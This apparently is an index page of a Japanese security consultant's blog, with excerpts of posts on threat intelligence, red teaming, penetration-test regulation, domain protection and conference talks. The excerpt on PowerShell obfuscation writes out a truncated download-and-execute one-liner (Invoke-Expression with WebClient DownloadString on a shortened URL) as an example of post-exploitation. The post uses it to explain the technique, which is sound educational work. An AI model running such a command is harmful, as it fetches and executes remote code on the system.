セキュリティコンサルタントの日誌から

セキュリティに関するエッセイなど

リスク分析の3つのアプローチとセキュリティの7S

(追記)2019年02月12日に追記を行いました。 リスク分析は、セキュリティ戦略策定の上で欠かせない基本的なアプローチです。 以前、日経SYSTEMSの記事「セキュリティコスト 5つの掟」(2018年10月号)にて、 一部のインタビュー記事が紹介されましたが、そ…

『インテリジェンス駆動型インシデントレスポンス』が発売されました!!+α

あけましておめでとうございます。 ご縁があり、翻訳させていただいた『インテリジェンス駆動型インシデントレスポンス』が12/26(水)に発売されました。ぜひ書店やAmazonでお買い求めください。(公開するの忘れてた...) www.oreilly.co.jp この本のセー…

Internet Week 2018で講演してきました!!

先日開催された、Intenet Week 2018の「D2-3 知れば組織が強くなる!ペネトレーションテストで分かったセキュリティ対策の抜け穴」のセッションで機会をいただき、講演をしてきました。 スライドは以下で公開しましたので、よろしければご参照ください。 Int…

US-CERTの「Publicly Available Tools Seen in Cyber Incidents Worldwide」を翻訳してみた!!

先日、US-CERTからサイバー犯罪に利用される公開ツールに関するアナウンスが出されました。 Publicly Available Tools Seen in Cyber Incidents Worldwide | US-CERT ITMediaにも取り上げられていますが、比較的面白い記事だったので勝手に翻訳してみました…

ドメイン保護手法に関する整理

ドメインは、企業ブランドを守る上で非常に重要な情報資産です。有名な企業のドメインを乗っ取ることができればフィッシング攻撃などへの悪用は非常にやりやすくなります。 今回は、ドメイン保護手法について、予防・検知・対応の観点から整理をしていきまし…

TLPT・TIBERに関する動向まとめ

金融庁より、TLPT(Therat-Lead Penetration Test)というキーワードが登場してきています。また、TIBER(Threat Intelligence Based Ethical Red Teaming)という概念が欧州系金融系を中心に話題になっています。 今回は、その動向と読むべき資料について整…

色で表すセキュリティ人材

色を使ってセキュリティチームの性質を説明することがよくあります。 例えば、攻撃技術(Offensive Technology)を専門とするチームをRed Teamと呼び、一方、セキュリティ監視やインシデント対応を行うセキュリティ運用チーム(Security Operation)のことを…

BSides Tokyoが開かれるらしい

LinkedInのブログでたまたま見つけましたが、BSides Tokyoが開かれるらしいです。 www.linkedin.com bsides.tokyo BSidesシリーズとは? 米国から始まった(?)セキュリティカンファレンスシリーズ群で、各地の発起人が確か一定の条件を満たせば、BSidesと…

#ssmjp 04に参加してきました!!

#ssmjp 4月に参加してきました。 ブログ枠で参加したのでアップデートしました。(勘違いして、アップロードできていなかったので、アップロードしました。ご迷惑をおかけしました。) 講演1:私の情報収集法 最初のスピーカーは「タイムライン・インテリ…

Cyber Threat Intelligenceとは何か?(その4・2018年度版)

前回の記事では、Operational Threat IntelligenceとStrategic Threat Intelligenceの定義について取り上げた後、Threat Intelligenceの共有方法についても触れました。今回は、Cyber Threat Intelligence Analystが陥りやすいバイアスやAttributionという技…

Cyber Threat Intelligenceとは何か?(その3・2018年度版)

2018/02/28 リンクを追加しました。 今回の記事では、Tactical Threat Intelligenceについて取り上げました。 今回は、SANSの"Cyber Threat Intelligence Consumption"をもとにOperational・Strategicレベルについて取り上げたいと思います。 Operational Th…

Cyber Threat Intelligenceとは何か?(その2・2018年度版)

前回の記事では、Cyber Threat Intelligenceの定義などについて解説しました。 www.scientia-security.org 今回の記事では、Threat Intelligenceの中でもTactical Threat Intelligence(戦術的インテリジェンス)に焦点を当ててみたいと思います。 戦術的イ…

Cyber Threat Intelligenceとは何か?(その1・2018年度版)

(修正履歴) 過去のエントリをいろいろ改善して再投稿しました。 2019年2月9日に一部更新を行いました。 今回のエントリーでは、Cyber Threat Intelligence(CTI)について解説をしていきます。 第1回では、Cyber Threat Intelligenceの概要について定義し…

Offensive Countermeasuresとは何か?

Offensive Countermeasures(OCM)とは、2009年にSANSインストラクターであるJohn Strand氏らが提唱した概念です。当時はあまり流行した考え方ではなかったと思いますが、Threat IntelligenceやThreat Huntingへの注目と合わせて、再度注目を集めている概念…

Active Defenseの定義とは?

2018/01/16 一部内容を更新しました。2018/02/07 一部内容を更新しました。 Active Defenseという言葉をご存知でしょうか? SANSでもSEC550: Active Defense, Offensive Countermeasures and Cyber Deceptionというコースが用意されていますし、CTI(Cyber T…

各規制はセキュリティ診断の頻度をどのように定めているか?

2018/01/09 金融庁関連の話題を追加しました。 少し前ですが、2017年8月にJPCERT/CCが「Web サイトへのサイバー攻撃に備えて」という報告を発表して、セキュリティ診断・ペネトレーションテストの頻度について言及をしています。今回は、各レギュレーシ…

脅威の検知レイヤーモデル

(修正履歴)一部追記しました。@ 2019.02.10 現在、Cyber Threat IntelligenceやThreat Intelligenceに興味を持っていますが、脅威を検知手法について整理してみました。 時間軸による検知レイヤーモデル 色々な考え方があるますが、検知のインプットは大き…

Threat Hunting for Dummiesを読んでみた!!

カンファレンスでもらった"Threat Hunting for Dummies"を積読していたのですが、時間ができたので読んで見たのでメモをまとめます。EDRで有名なCarbon Black社が書いているので、クオリティも十分でした。 www.carbonblack.com Threat Huntingの定義と目的 …

CISSPの勉強方法

CISSP(Certified Information Systems Security Professional)という試験は、セキュリティの経験と全般的な知識を持っていることを示す資格です。一般的かつセキュリティと重要な資格である一方、独学用の勉強リソースはあまり多くないと言わざるを得ませ…

PowerShellの難読化について

PowerShellは、Post-Exploitationプロセスで非常に良く使われます。例えば、以下のコマンドを実行するとリモートにあるファイルを取得してその内容を実行してくれます。 Invoke-Expression (New-Object Net.WebClient).DownloadString("http://bit.ly/L3g1t"…

AVTokyo 2017で講演してきました。

昨日、AVTOKYO JPで講演させていただきました。 使わせていただいた資料を公開しました。 [AVTOKYO 2017] What is red team? www.slideshare.net

Cyber Threat IntelligenceとDNSデータ

Cyber Threat IntelligenceやThreat Actor Attributionの観点では、悪性ドメイン(C2ドメイン)は足が速い(すぐに変わる)のでDNSデータ分析は重要な要素となります。 例えば、マルウェア解析チームにより特定のC2通信を発生させていたと報告してきたとし…

Threat Actor Attributionとは何か?

Threat Actor Attributionという単語をきいたことはありますでしょうか? 今回は、Cyber Threat Intelligenceの分野で重要なThreat Actor Attributionについて、以下の講演をもとに勉強してみたいと思います。 www.youtube.com Threat Actor Attributionとは…

思考実験:クラウドソーシングはツールの欠点を補えるか?

久しぶりに記事を更新したいと思います。本日は、Webアプリケーションについての思考実験をしてみたいと思います。 既にご存知の通り、Webアプリケーション診断の脆弱性スキャナとして、様々な製品が登場しています。 IBM AppScan HP WebInspect Rapid7 AppS…

ssmjpのプレゼンテーションを公開しました。

ssmjpにて、Red Teamに関するプレゼンテーションをさせていただきました。資料を公開しました。(公開を忘れていました。すいません) www.slideshare.net

サイバーリスク保険に関する考察

以前某論文誌にサイバーリスク保険について書いたことがあるのですが、最近またサイバーリスク保険について説明する機会があったので、ブログにまとめておこうと思います。 論文執筆時の情報を元にしているため、古い記載がある可能性があります。ご容赦くだ…

米国文化とセキュリティ - なぜ自動化が積極的に採用されるのか?

昔からセキュリティ製品評価をしていると、自動遮断・自動連携など自動化のうたい文句にしていることが非常によくあります。最近は米国のカンファレンスに頻繁に参加していますが、多くの製品のキーワードとして「自動化」は目玉機能として紹介されます。 し…

SANS Cyber Threat Intelligence Summitに参加してきた!!

以前、SANS Cyber Threat Intelligence Summitに参加してきました(バックデートして投稿しています。) SANS Cyber Threat Intelligence Summitとは? SANS Cyber Threat Intelligence Summitとは、SANSが開催しているThreat Intelligenceに関するサミット…

CISOの役割とは?

※ セキュリティの7Sについて追加しました。 企業において、セキュリティ上一番えらい役職をCSOとかCISOと呼びます。(以降、基本的にCISOで統一します) CSO(Chief Security Officer・最高セキュリティ責任者) CISO(Chief Information Security Officer・最…

Cyber Threat Intelligenceとは何か?(その1)

過去の投稿に新しい情報等を更新して再投稿しました。 www.scientia-security.org